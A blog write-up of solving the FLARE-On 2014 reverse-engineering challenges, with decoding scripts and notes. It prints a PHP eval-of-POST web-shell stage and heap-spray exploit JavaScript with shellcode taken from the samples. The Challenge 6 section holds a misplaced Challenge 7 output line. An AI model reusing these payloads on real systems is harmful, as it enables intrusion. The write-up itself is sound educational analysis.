Busy under the pressure of releasing the new Dissecting the Hack book, the challenge went to the back of my mind until the 24th of July. I was facing a pretty hard-hitting bit of writer's block and frustration. I agreed to let myself have a break to do the challenge for one week before getting back to my commitments.
Although the challenge started in early July, it ran up until 15 September. There was an unspoken moratorium on answers/solutions while the challenge ran, but now that the samples are all freely available from their website, some are coming forth with how they completed them.
This is my story.
Challenge 1
The first challenge started out with downloading an executable from the flare-on.com website. I immediately threw it into IDA and started poking around, only to discover that it was just a dropper for the real challenge :) I let it do its thing, agreed to a EULA without reading it, and received the first challenge file:
File Name       : Challenge1.exe
File Size       : 120,832 bytes
MD5             : 66692c39aab3f8e7979b43f2a31c104f
SHA1            : 5f7d1552383dc9de18758aa29c6b7e21ca172634
Fuzzy           : 3072:vaL7nzo5UC2ShGACS3XzXl/ZPYHLy7argeZX:uUUC2SHjpurG
Import Hash     : f34d5f2d4577ed6d9ceec516c1f5a744
Compiled Time   : Wed Jul 02 19:01:33 2014 UTC
PE Sections (3) : Name    Size     MD5
                  .text   118,272  e4c64d5b55603ecef3562099317cad76
                  .rsrc   1,536    6adbd3818087d9be58766dccc3f5f2bd
                  .reloc  512      34db3eafce34815286f13c2ea0e2da70
Magic           : PE32 executable for MS Windows (GUI) Intel 80386 32-bit Mono/.Net assembly
.NET Version    : 2.0.0.0
SignSrch        : offset    num   description [bits.endian.size]
                  0040df85  2875  libavcodec ff_mjpeg_val_ac_luminance [..162]
                  0040e05d  2876  libavcodec ff_mjpeg_val_ac_chrominance [..162]
Based on this output from the file, I can see first of all that it was built from .NET 2.0 (based on the mscorlib import). That'll be important later to determine what tool to analyze the file in; IDA Pro is not the most conducive tool for .NET applications.
At this point, let's run it and see what happens:
The image shows some happy little trees and a great, big "DECODE" button. Clicking this button changes the image thusly:
Without any clue of what to do with the challenge, or what I'm actually looking for, I open it up for analysis with Red Gate .NET Reflector.
Typically with static analysis on an unknown file, I start from a main() and work down. The equivalent is seen here with InitializeComponent():
Notably, I see the decode button being drawn on the screen with button.text = "DECODE"; and a subroutine applied to this button with button.Click += new EventHandler(this.btnDecode_Click); My clue here is to hunt for this routine, btnDecode_Click, which shows:
Math is a good sign. Looking at this, I see three distinct string encoding routines, each producing its own string variable. The first is a byte-by-byte encoding (a nibble swap followed by an XOR with 0x29), the second swaps adjacent pairs of bytes, and the third is a simple XOR. This final value is then applied to this.lbl_title.Text.
From here, the easiest route was to simply copy the binary data out (Resources.dat_secret) and replicate the routines in Python:
# Python 2
str = str2 = str3 = ''
data = "\xA1\xB5\x44\x84\x14\xE4\xA1\xB5\xD4\x70\xB4\x91\xB4\x70\xD4\x91\xE4\xC4\x96\xF4\x54\x84\xB5\xC4\x40\x64\x74\x70\xA4\x64\x44"
print data

# Routine 1: swap the two nibbles of each byte, then XOR with 0x29
for i in data:
    str += chr( ( (ord(i) >> 4) | (ord(i) << 4) & 240) ^ 0x29)
print str

# Routine 2: swap each adjacent pair of characters
for j in range(0, len(str)-1, 2):
    str2 += str[j+1] + str[j]
print str2

# Routine 3: XOR each character with 0x66
for k in str2:
    str3 += chr(ord(k) ^ 0x66)
print str3
This resulted in the output of:
¦Dä¶Sí¦+p¦æ¦p+æS-û(Tä¦-@dtpñdD 3rmahg3rd.b0b.d0ge@flare-on.com r3amghr3.d0b.b0degf@alero-.noc m
The first round of encoding resulted in an email address. Cool! I poked around for a bit more and found no additional functionality... so... I email the address? Sent on 24 Jul 14 at 2123:
30 seconds later I receive an automated email with the second challenge. Oh, so that's how these are played :)
Challenge 2
Challenge 2 consisted of a ZIP with an HTML and a PNG image:
Path = C2.zip
Type = zip
Physical Size = 10758

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2014-07-07 22:22:33 ....A         8375         2857  home.html
2014-07-07 21:30:25 D....            0            0  img
2014-07-07 21:30:47 ....A         9560         7430  img\flare-on.png
------------------- ----- ------------ ------------  ------------------------
                                 17935        10287  2 files, 1 folders
I tried to view the PNG and received an error:
Opening it up in a hex editor (and then a text editor) showed that there was no picture data, just a set of PHP code. I was actually disappointed by this. I was hoping it'd be PHP appended to a PNG to at least confuse the newbies, but this was very apparent.
The PHP code was a basic text obfuscation routine where two arrays were created to build new code. One array contained an alphabet of all possible characters used ($terms) and the second contained the actual sequence of the output data ($order). I copy/pasted the tables into a thrown-together Python script:
terms = ["M", "Z", "]", "p", "\\", "w", "f", "1", "v", "<", "a", "Q", "z", " ", "s", "m", "+", "E", "D", "g", "W", "\"", "q", "y", "T", "V", "n", "S", "X", ")", "9", "C", "P", "r", "&", "\'", "!", "x", "G", ":", "2", "~", "O", "h", "u", "U", "@", ";", "H", "3", "F", "6", "b", "L", ">", "^", ",", ".", "l", "$", "d", "`", "%", "N", "*", "[", "0", "}", "J", "-", "5", "_", "A", "=", "{", "k", "o", "7", "#", "i", "I", "Y", "(", "j", "/", "?", "K", "c", "B", "t", "R", "4", "8", "e", "|"]
code = [59, 71, 73, 13, 35, 10, 20, 81, 76, 10, 28, 63, 12, 1, 28, 11, 76, 68, 50, 30, 11, 24, 7, 63, 45, 20, 23, 68, 87, 42, 24, 60, 87, 63, 18, 58, 87, 63, 18, 58, 87, 63, ... ... 4, 7, 91, 91, 4, 37, 51, 70, 21, 47, 93, 8, 10, 58, 82, 59, 71, 71, 71, 82, 59, 71, 71, 29, 29, 47]
data = ''
for i in code:
    data += terms[i]
print data
Running this produced a second PHP script (carriage returns added for clarity):
$_= 'aWYoaXNzZXQoJF9QT1NUWyJcOTdcNDlcNDlcNjhceDRGXDg0XDExNlx4NjhcOTdceDc0XHg0NFx4NEZceDU0XHg2QVw5N1x4NzZceDYxXHgzNVx4NjNceDcyXDk3XHg3MFx4NDFcODRceDY2XHg2Q1w5N1x4NzJceDY1XHg0NFw2NVx4NTNcNzJcMTExXDExMFw2OFw3OVw4NFw5OVx4NkZceDZEIl0pKSB7IGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbIlw5N1w0OVx4MzFcNjhceDRGXHg1NFwxMTZcMTA0XHg2MVwxMTZceDQ0XDc5XHg1NFwxMDZcOTdcMTE4XDk3XDUzXHg2M1wxMTRceDYxXHg3MFw2NVw4NFwxMDJceDZDXHg2MVwxMTRcMTAxXHg0NFw2NVx4NTNcNzJcMTExXHg2RVx4NDRceDRGXDg0XDk5XHg2Rlx4NkQiXSkpOyB9';
$__='JGNvZGU9YmFzZTY0X2RlY29kZSgkXyk7ZXZhbCgkY29kZSk7';
$___="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";
eval($___($__));
Looking at the big block of data suggests that it is Base64, just based on its appearance. We see it executed by the obfuscated string of $___ which is a weird mixture of octal and hex bytes. By running that string through an online interpreter, we see that it is simply base64_decode:
First we Base64 decode the small block of data in $__ to receive:
$code=base64_decode($_);eval($code);
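Both of these small decoding steps can also be reproduced offline instead of through an online interpreter. The following is a minimal sketch, assuming Python 3; decode_php_escapes is a made-up helper name for illustration, and it only handles the \xHH (hex) and \NNN (octal) escapes that appear in this sample.

```python
import base64
import re

def decode_php_escapes(s):
    """Expand \\xHH (hex) and \\NNN (octal) escapes as PHP does inside double quotes."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))   # \xHH form
        return chr(int(m.group(2), 8))        # \NNN octal form
    return re.sub(r"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})", repl, s)

# Both values are copied from the second-stage PHP script shown earlier.
func_name = decode_php_escapes(r"\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65")
stage = base64.b64decode("JGNvZGU9YmFzZTY0X2RlY29kZSgkXyk7ZXZhbCgkY29kZSk7").decode("ascii")

print(func_name)
print(stage)
```

The same b64decode call can then be pointed at the large $_ block to recover the final stage.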
No surprises here. Now, the big block of data:
$_= if(isset($_POST["\\97\\49\\49\\68\\x4F\\84\\116\\x68\\97\\x74\\x44\\x4F\\x54\\x6A\\97\\x76\\x61\\x35\\x63\\x72\\97\\x70\\x41\\84\\x66\\x6C\\97\\x72\\x65\\x44\\65\\x53\\72\\111\\110\\68\\79\\84\\99\\x6F\\x6D"])) { eval(base64_decode($_POST["\\97\\49\\x31\\68\\x4F\\x54\\116\\104\\x61\\116\\x44\\79\\x54\\106\\97\\118\\97\\53\\x63\\114\\x61\\x70\\65\\84\\102\\x6C\\x61\\114\\101\\x44\\65\\x53\\72\\111\\x6E\\x44\\x4F\\84\\99\\x6F\\x6D"])); };
At this point, PHP is looking to see if an HTTP POST field holds a value and, if so, evals the Base64-decoded version of it, like a very simple web shell. One issue is that the online interpreter doesn't like the double slashes, but that's an easy fix. Another is that the backslash values without an "x" aren't octal but the actual ASCII decimal values for characters. Unsure of how to print those easily, I threw together a quick script to decode them:
data = r"\97\49\49\68\x4F\84\116\x68\97\x74\x44\x4F\x54\x6A\97\x76\x61\x35\x63\x72\97\x70\x41\84\x66\x6C\97\x72\x65\x44\65\x53\72\111\110\68\79\84\99\x6F\x6D"
result = ''
items = data.split('\\')
for i in items:
    if i:
        if i[0] == 'x':
            # \xHH: hex value
            result += chr(int(i[1:3], 16))
        else:
            # \NNN: decimal ASCII value
            result += chr(int(i))
print result
Running this produced:
a11DOTthatDOTjava5crapATflareDASHonDOTcom (or: a11.that.java5crap@flare-on.com)
This was a pretty easy one that was done in 15 minutes. The email was shot off on 24 July 14 at 2138 and I received #3 immediately after.
Challenge 3
Challenge 3 was a simple, tiny executable named such_evil:
File Name       : such_evil
File Size       : 7,168 bytes
MD5             : f015b845c2f85cd23271bc0babf2e963
SHA1            : f5d527908f363f6b1efad684532bf544a2d077ac
Fuzzy           : 96:FcVTXrxJsuqISnUitUlGTw9u6Q0H5TrgCV5E/a/mtVox:F4XMuqIitbAH5TP5kEOox
Import Hash     : 50f433a443bc36990996bb4d4dd484aa
Compiled Time   : Thu Jan 01 00:00:00 1970 UTC
PE Sections (2) : Name    Size     MD5
                  .text   6,144    a75c2e2daad859328d31827f1318efd8
                  .data   512      f553d080b0d5ee70296bfd5aef252b79
Magic           : PE32 executable for MS Windows (console) Intel 80386 32-bit
Opening it up in IDA Pro showed that static analysis alone wouldn't be practical. There is simply a large routine that writes new shellcode to memory, one byte at a time, and then calls it.
I dumped IDA and switched over to Immunity Debugger. I find its debugger much easier to use than IDA's (the latter of which I'm slowly learning to use).
Following the code shows that it begins writing the shellcode to memory at EBP-0x201. I went to that memory space, nulled it, and monitored the writing:
Once the data was all written, it simply LEA's EBP-0x201 into EAX, and CALL EAX:
Early on in this new routine, there is a FOR loop that XOR's data by 0x66. It decodes from that point in the shellcode forward through the remainder of the data, with an apparent string appearing at the beginning:
"and so it begins"
Additional text is also seen here: hus\00, hsaurhnopa. In understanding shellcode, these are attempts to push (0x68 "h") a string onto the stack in four-byte segments. And, in the next part of code, we see that's exactly what happened. This string ended up becoming an XOR key for the next round of decoding: "nopasaurus"
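To make the push ordering concrete, here is a small sketch in Python 3 of how the pieces end up as one string. The helper name rebuild_pushed_string is hypothetical, and the operand for the first push is assumed to be padded with two null bytes (only "hus\00" is visible in the dump).

```python
def rebuild_pushed_string(pushes):
    """Join 4-byte PUSH operands, given in execution order, into the string left on the stack."""
    # The stack grows downward, so the last value pushed sits at the lowest
    # address and is therefore the first part of the string when read forward.
    raw = b"".join(reversed(pushes))
    # Stop at the first null terminator.
    return raw.split(b"\x00", 1)[0].decode("ascii")

# Operands in the order the shellcode pushes them (0x68 is the PUSH imm32 opcode).
pushes = [b"us\x00\x00", b"saur", b"nopa"]
key = rebuild_pushed_string(pushes)
print(key)
```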
After decoding we see another block: "get ready to get nop'ed so damn hard in the paint". The paint? The pain? The ... I don't know.
More decoding, this time by a hardcoded 4-byte XOR key of GlOb (0x624F6C47 when read as a little-endian DWORD). Then an XOR by "omg is it almost over?!?" which results in ... an email address:
However, there's more code! By following the rest, we see that the next block contains the error alert window that was shown at the very beginning.
14 minutes after starting, an email was fired off to such.5h311010101@flare-on.com on 24 July 14 at 2152.
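The layered decoding in this challenge boils down to a repeating-key XOR applied several times with different keys. Below is a rough sketch in Python 3 rather than the shellcode's actual implementation; xor_with_key is an illustrative helper and the sample plaintext is a placeholder, not data from the binary. It also shows how the DWORD constant from the text maps onto key bytes in memory.

```python
import struct
from itertools import cycle

def xor_with_key(data, key):
    """XOR every byte of data against key, repeating the key as needed."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))

# A 32-bit immediate is stored least-significant byte first on x86.
dword_key = struct.pack("<I", 0x624F6C47)
print(dword_key)

# XOR is its own inverse, so encoding and decoding are the same call.
sample = b"placeholder plaintext"          # hypothetical data
encoded = xor_with_key(sample, b"nopasaurus")
decoded = xor_with_key(encoded, b"nopasaurus")
print(decoded)
```

A single-byte key such as 0x66 is just the special case where the key has length one.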
Challenge 4
Things are starting to pick up now. Challenge 4 is a PDF named "APT9001.pdf". The name is obviously a spoof on the APT1 report, and I started to wonder if there was a key in it. Like it's using Trojan 9002 ... minus one?
File Name       : APT9001.pdf
File Size       : 21,284 bytes
MD5             : f2bf6b87b5ab15a1889bddbe0be0903f
SHA1            : 58c93841ee644a5d2f5062bb755c6b9477ec6c0b
Fuzzy           : 384:y58K1Qdl6W739kGHQN3kiAJdounFkltXw7iYR4hr3h9ihFjhVJVX5g/zd9Gq:F9gWtHQDyFyC7+d32jHX5y
Magic           : PDF document, version 1.5
Using Didier Stevens' pdf-parser showed some items of interest:
brians-mbp:Tools bbaskin$ ./pdf-parser.py ~/FLARE/4/APT9001.pdf
PDF Comment '%PDF-1.5\r\n'

PDF Comment '%\xea\xbb\xc1\x9c\r\n'

obj 1 0
 Type: /Catalog
 Referencing: 2 0 R, 3 0 R, 5 0 R

  <<
    /Type /Catalog
    /Outlines 2 0 R
    /Pages 3 0 R
    /OpenAction 5 0 R
  >>

obj 5 0
 Type: /Action
 Referencing: 6 0 R

  <<
    /Type /Action
    /S /JavaScript
    /JS 6 0 R
  >>

obj 6 0
 Type:
 Referencing:
 Contains stream

  <<
    /Length 6170
    /Filter '[ \r\n /Fla#74eDe#63o#64#65 /AS#43IIHexD#65cod#65 ]'
  >>
Notably, Object 5 (obj 5 0) is an action that loads JavaScript from object 6 (/JS 6 0 R). So, we divert our attention to object 6 and see that its stream is encoded, with the filter names themselves obfuscated. In each name, random characters are replaced with their hex values (#XX), but a visual look shows them as "FlateDecode" and "ASCIIHexDecode".
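The #XX substitution is simple enough to undo by script instead of by eye. A minimal sketch in Python 3, where decode_pdf_name is a hypothetical helper name and not part of pdf-parser:

```python
import re

def decode_pdf_name(name):
    """Replace each #XX escape in a PDF name with the character it encodes."""
    return re.sub(r"#([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), name)

# Filter names exactly as they appear in object 6.
filters = ["/Fla#74eDe#63o#64#65", "/AS#43IIHexD#65cod#65"]
decoded_filters = [decode_pdf_name(f) for f in filters]
print(decoded_filters)
```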
Targeting this object with pdf-parser dumps a block of JavaScript data that we need to work with:
brians-mbp:Tools bbaskin$ ./pdf-parser.py ~/FLARE/4/APT9001.pdf -o 6 -f
obj 6 0
 Type:
 Referencing:
 Contains stream

  <<
    /Length 6170
    /Filter '[ \r\n /Fla#74eDe#63o#64#65 /AS#43IIHexD#65cod#65 ]'
  >>

var HdPN = "";
var zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf = "";
var IxTUQnOvHg = unescape("%u72f9%u4649%u1525%u7f0d%u3d3c%ue084%ud62a%ue139%ua84a%u76b9%u9824%u7378%u7d71%u757f%u2076%u96d4 .. removed for brevity .. %u6f72%u6863%u7845%u7469%uff54%u2474%uff40%u2454%u5740%ud0ff");
var MPBPtdcBjTlpvyTYkSwgkrWhXL = "";
for (EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA=128;EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA>=0;--EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA) MPBPtdcBjTlpvyTYkSwgkrWhXL += unescape("%ub32f%u3791");
ETXTtdYdVfCzWGSukgeMeucEqeXxPvOfTRBiv = MPBPtdcBjTlpvyTYkSwgkrWhXL + IxTUQnOvHg;
OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY = unescape("%ub32f%u3791");
fJWhwERSDZtaZXlhcREfhZjCCVqFAPS = 20;
fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA = fJWhwERSDZtaZXlhcREfhZjCCVqFAPS+ETXTtdYdVfCzWGSukgeMeucEqeXxPvOfTRBiv.length
while (OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY.length ...
bGtvKT = zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.length + 20
while (zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.length < bGtvKT) zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf += zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf;
Juphd = zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.substring(0, bGtvKT);
QCZabMzxQiD = zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.substring(0, zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.length-bGtvKT);
while(QCZabMzxQiD.length+bGtvKT < 0x40000) QCZabMzxQiD = QCZabMzxQiD+QCZabMzxQiD+Juphd;
FovEDIUWBLVcXkOWFAFtYRnPySjMblpAiQIpweE = new Array();
This is an ugly block of code (some lines were removed as they conflicted with Blogger formatting). There are a lot of long, randomly named variables, but this is of little consequence. Using Notepad++ I just find/replace all of them to get code that looks like this.
var _VAR2_ = "";
for (_VAR3_=128;_VAR3_>=0;--_VAR3_) _VAR2_ += unescape("%ub32f%u3791");
_VAR4_ = _VAR2_ + __CODE__;
_VAR5_ = unescape("%ub32f%u3791");
_VAR6_ = 20;
_VAR7_ = _VAR6_+_VAR4_.length
while (_VAR5_.length<_VAR7_) _VAR5_+=_VAR5_;
_VAR8_ = _VAR5_.substring(0, _VAR7_);
_VAR9_ = _VAR5_.substring(0, _VAR5_.length-_VAR7_);
while(_VAR9_.length+_VAR7_ < 0x40000) _VAR9_ = _VAR9_+_VAR9_+_VAR8_;
_VAR11_ = new Array();
for (_VAR3_=0;_VAR3_<100;_VAR3_++) _VAR11_[_VAR3_] = _VAR9_ + _VAR4_;
for (_VAR3_=142;_VAR3_>=0;--_VAR3_) _VAR1_ += unescape("%ub550%u0166");
_VAR12_ = _VAR1_.length + 20
while (_VAR1_.length < _VAR12_) _VAR1_ += _VAR1_;
_VAR13_ = _VAR1_.substring(0, _VAR12_);
_VAR10_ = _VAR1_.substring(0, _VAR1_.length-_VAR12_);
while(_VAR10_.length+_VAR12_ < 0x40000) _VAR10_ = _VAR10_+_VAR10_+_VAR13_;
_VAR11b_ = new Array();
for (_VAR3_=0;_VAR3_<125;_VAR3_++) _VAR11b_[_VAR3_] = _VAR10_ + _VAR1_;
Interesting ... but I don't care. This is all exploitation code; it doesn't do anything that we care about. Instead, we should look at the shellcode that is injected alongside the exploit:
var __CODE__ = unescape("%u72f9%u4649%u1525%u7f0d%u3d3c%ue084%ud62a%ue139%ua84a%u76b9%u9824%u7378%u7d71%u757f%u2076%u96d4%uba91%u1970%ub8f9%ue232%u467b%u9ba8%ufe01%uc7c6%ue3c1%u7e24%u437c%ue180%ub115%ub3b2%u4f66%u27b6%u9f3c ...
This is shellcode stored as escaped unicode. Notably, when stored this way, the bytes are swapped. For example, %u72f9 is actually 0xf972. If you attempt to just strip the %u and convert to hex, you'd have to swap every two bytes to get the correct value. Or, just use native JavaScript to do it for you. I did the former to get shellcode that had this:
Offset    0  1  2  3  4  5  6  7  8  9 10 11 12 13 14 15
00000000 F9 72 49 46 25 15 0D 7F 3C 3D 84 E0 2A D6 39 E1 ùrIF% <=„à*Ö9á
...
00000768 1C 03 F3 8B 14 8E 03 D3 52 33 FF 57 68 61 72 79 ó‹ Ž ÓR3ÿWhary
00000784 41 68 4C 69 62 72 68 4C 6F 61 64 54 53 FF D2 68 AhLibrhLoadTSÿÒh
00000800 33 32 01 01 66 89 7C 24 02 68 75 73 65 72 54 FF 32 f‰|$ huserTÿ
00000816 D0 68 6F 78 41 01 8B DF 88 5C 24 03 68 61 67 65 ÐhoxA ‹ßˆ\$ hage
00000832 42 68 4D 65 73 73 54 50 FF 54 24 2C 57 68 44 21 BhMessTPÿT$,WhD!
00000848 21 21 68 4F 57 4E 45 8B DC E8 00 00 00 00 8B 14 !!hOWNE‹Üè ‹
00000864 24 81 72 0B 16 A3 FB 32 68 79 CE BE 32 81 72 17 $ r £û2hyξ2 r
00000880 AE 45 CF 48 68 C1 2B E1 2B 81 72 23 10 36 9F D2 ®EÏHhÁ+á+ r# 6ŸÒ
Just with visual analysis, I see "LoadLibraryA" pop out, as well as "MessageBoxA" and "OWNED!!!".
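For reference, the %u conversion with its byte swap can be scripted in a few lines. This is a minimal sketch in Python 3, assuming the input contains only %uXXXX escapes (which is true of the visible portion of this sample); unescape_u is a hypothetical helper name.

```python
import re

def unescape_u(s):
    """Convert %uXXXX escapes to raw bytes, emitting each 16-bit unit low byte first."""
    out = bytearray()
    for m in re.finditer(r"%u([0-9A-Fa-f]{4})", s):
        # %u72f9 is the 16-bit value 0x72F9, which sits in memory as F9 72.
        out += int(m.group(1), 16).to_bytes(2, "little")
    return bytes(out)

# First four units of the shellcode string from the PDF.
head = unescape_u("%u72f9%u4649%u1525%u7f0d")
print(head.hex(" "))
```

The result lines up with the first eight bytes of the hex dump above.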
With this block of shellcode, I use shellcode2exe.py to wrap it into an executable and launch it in Immunity Debugger. Notably, during execution, out-of-sequence DWORDs are XOR'd to form the parts of an email address, which is assembled to: wa1ch.d3m.spl01ts@flare-on.com.
This one took a good while longer than the previous ones. At 2348, almost two hours later after going down various rabbit holes of the exploit and fixing the PDF and putting my kids to sleep very late, I sent off the email... then promptly went to bed.
Challenge 5
Challenge #5 was waiting in my inbox when I woke up early the next morning, another executable:
File Name       : 5get_it
File Size       : 101,376 bytes
MD5             : eb4a4861a5d641402551dcfd6f2a4bfa
SHA1            : d0716637a979d071f4c0e32e80393f3a55652aed
Fuzzy           : 1536:eHc4Y6O5rgKXNNMnwughXT4m1pKnm3dBdshDr45oQPPGRPTJT:qYv5M+NMwtTzCWPqh45eRPTJT
Import Hash     : a609e70126618238af613915d25abb82
Compiled Time   : Thu Jul 03 22:01:47 2014 UTC
PE Sections (4) : Name    Size     MD5
                  .text   75,776   744af5711d3ed547a1a607631e9d41ea
                  .rdata  10,752   2d438c10143d8d363256b109982a281c
                  .data   9,728    abb223f71d55ef5c6b378cd9d968f5e7
                  .reloc  4,096    19b1fca9179c9b60507bd0d0dce88d36
Magic           : PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
SignSrch        : offset    num   description [bits.endian.size]
                  1000abca  1299  classical random incrementer 0x343FD 0x269EC3 [32.le.8&]
                  10016482  2545  anti-debug: IsDebuggerPresent [..17]
Notably, this file was flagged by 'file' as a DLL, but failed all of my peutils DLL scraping routines because:
AttributeError: PE instance has no attribute 'DIRECTORY_ENTRY_EXPORT'
I load it into IDA Pro and start with DllMain():
By some basic analysis, the sample first determines if HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost is set and, if not, copies itself to C:\Windows\System32\svchost.dll and entrenches in the registry there as "c:\windows\system32\rundll32.exe c:\windows\system32\svchost.dll". Overall, pretty common functionality for a lot of malware. Following the code flow, I see a clear sign of a very basic keylogger. There is an API call to passively retrieve keystrokes from the buffer (GetAsyncKeyState()) and then a large switch statement for most keys on the keyboard:
By following one of these routines, for the letter A, I see a lot of global boolean values being checked to eventually toggle a new one on or off. Just through deduction, I realize that the booleans being set to true (1) are only set within that respective keystroke and are checked in others, suggesting that some keys need to be typed before others for that key to be toggled on.
In essence, the program is keylogging and looking for a particular word or phrase to be typed in. With this known, I go about labeling each and every subroutine, and then each respective boolean value. This helps explain the labels in the screenshot above, but also showed that in many keystrokes there are no actions taken, suggesting that the malware doesn't care if they are pressed. After a series of naming, it definitely shows that there's a limited set of keys being logged:
With those set, you could attempt to trace through the keystrokes like a backwards choose-your-own-adventure series (because I always wanted to see how to get to the goriest deaths), but there was an easier way that didn't require running the malware. When you create global variables and constants in C, the compiler will group them together. And so by double clicking on any global boolean you can see it in the context of the rest of the global values. I ignored this at first, thinking that the author would obfuscate the series of values so that they wouldn't read as an email ... but I was wrong. They were in direct sequence and spelled out the email address (l0ggingdoturdot...):
When initially pulling out the email I noticed one issue. The email was l`gging.Ur.5tr0ke5. There shouldn't be an apostrophe there, so I checked my code again. When I started xref'ing the values to double check I realized that the apostrophe keystroke was used to set the letter "0".
Odd... regardless, I change the character and get the legitimate email: l0gging.Ur.5tr0ke5@flare-on.com
The email was sent off that morning of 25 July at 0923 after spending about 2 hours on it. Then, I went to work.
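The flag-chaining logic described in this challenge, where each key handler only sets its boolean if the previous one is already set, can be modeled roughly as below. This is a simplified sketch in Python 3, not a reconstruction of the sample's code: the SequenceWatcher class, the "abc" target phrase, and the reset-on-wrong-key behavior are all assumptions made for illustration.

```python
class SequenceWatcher:
    """Tracks one boolean per expected keystroke, set only in order."""

    def __init__(self, target):
        self.target = target
        self.flags = [False] * len(target)

    def on_key(self, ch):
        for i, expected in enumerate(self.target):
            prior_ok = i == 0 or self.flags[i - 1]
            # A handler only flips its own flag when the previous flag is set.
            if ch == expected and prior_ok and not self.flags[i]:
                self.flags[i] = True
                return
        # Assumption: any key that does not advance the sequence clears all flags.
        self.flags = [False] * len(self.target)

    @property
    def complete(self):
        return all(self.flags)

watcher = SequenceWatcher("abc")   # placeholder phrase
for ch in "abc":
    watcher.on_key(ch)
print(watcher.complete)
```

Because the flags sit next to each other in order, reading them top to bottom gives the phrase directly, which is the shortcut the global-variable layout provided.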
Challenge 6
At this point I notified my coworkers that I was starting on the challenge and learned that two were already on #6. However, we maintained the professional courtesy of not sharing with each other :) They warned me that #6 was said to be the most difficult challenge of the entire series, with every previous challenge there just to separate the wheat from the chaff. And they weren't wrong.
File Name       : e7bc5d2c0cf4480348f5504196561297
File Size       : 1,221,064 bytes
MD5             : e7bc5d2c0cf4480348f5504196561297
SHA1            : 7ff95920877af815c4b33da9a4f0c942fe0907d6
Fuzzy           : 12288:AAgOYrVfqiJwPy4Yj7/fb358YegLauCC9yJawoguxK1wT2syIvj90NK8:/cVfqiJUyL73b358YegxCsKKwI7CJ
Magic           : ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, for GNU/Linux 2.6.24, stripped
SignSrch        : offset    num   description [bits.endian.size]
                  000f7945  2417  MBC2 [32.le.248&]
                  000f8320  173   CRC-1 [crc8.0x01 le rev int_min.256]
                  000f8320  171   CRC-1 [crc8.0x01 lenorev int_min.256]
                  000f863c  2418  MBC2 [32.be.248&]
                  000f90d4  3051  compression algorithm seen in the game DreamKiller [32.be.12&]
Nice! A 64-bit Linux ELF. I've had experience with only a handful of ELFs, previously doing a few Phalanx, Tiny Shell, ChikDOS, and a difficult sample for my RSA interview. The 64-bit proved a bit of a hurdle as it meant I couldn't decompile any of the functions (at the time I was using 6.5; 6.6 had just recently been introduced with that feature).
Challenge 6 is hard. It's tedious. There are no short cuts; you would simply have to methodically step through thousands of lines of code and trace variables carefully. However, everyone tried initially to shortcut it.
I first attempted a static analysis of the file and gave up within a few hours. There were 2400 routines, with a majority appearing similar to the one shown below:
This would require debugging to get anywhere, and I am not particularly fond of IDA Pro's debugger. I'm quite fond of Immunity/Olly and right clicking on arbitrary values to show them in hex, and to see comparisons live with actual address names instead of "data[ebp+410]", but I digress. There is no Immunity/Olly available for Linux, but there is Evan's Debugger (EDB). That afternoon I sat down and ran through the sample.
The first thing to note was that it required command line arguments, but didn't tell you how many or what they were.
At this point, I decide to force myself to go the Linux route. Both coworkers were comfortable with IDA, and one had already created a set of FLIRT signatures to identify all of the statically linked routines. After an hour of learning to do the same he noted that there were very few routines resolved, so I went back to just forcing my way through. Hitting too many issues with EDB, with just not enough comfort with it, I switched back to IDA Pro.
E:\malware\FLARE\7>7_bruteforce.py
da7.f1are.finish.lin3@flare-on.com
I used the remote debugger within IDA Pro to run the sample. I created a new Xubuntu VM and placed the malware sample and the IDA remote debugger app on the desktop, networked the two VMs together, and kicked it off.
While debugging to determine how many arguments I should supply, I set multiple breakpoints along different routes to see which number of args would take me the farthest. As no calls were documented (via previous IDA FLIRT sigs), they had to be identified by hand. That means determining what TerminateProcess(), printf(), strcmp(), CreateFileA(), etc are by sight. This took a long time but paid off. After spending hours following the flow of logic to see where it would crash, I hit upon the key to the first argument:
In the code above the sample checks the length of the first argument to make sure it's 10 bytes. It then XOR's the entire argument by 0x56 and checks the result against "bngcg`debd". Failing either causes a print of "bad" and TerminateProcess(). XOR'ing that value shows that arg1 must be set to "4815162342".
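Since XOR is its own inverse, recovering the argument only takes one pass over the comparison string. A quick sketch in Python 3 (xor_bytes is just an illustrative helper name):

```python
def xor_bytes(data, key):
    """XOR every byte of data with a single-byte key."""
    return bytes(b ^ key for b in data)

# The string the sample compares against, and the XOR key it applies to arg1.
expected = b"bngcg`debd"
arg1 = xor_bytes(expected, 0x56)
print(arg1.decode("ascii"))
```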
I ran back and ran the sample with that as the argument. Good news, no more bad! Bad news... it "froze".
This leads to another issue going on with this sample. It relies upon syscall() greatly for many of its functions, sort of as a consolidated API for multiple functions, depending on what value you push to it, similar to network RPC. However, it took some time to realize that 64-bit Linux syscall() values were not the same as 32-bit. I eventually used this site as a resource: Linux System Call Table for x86_64
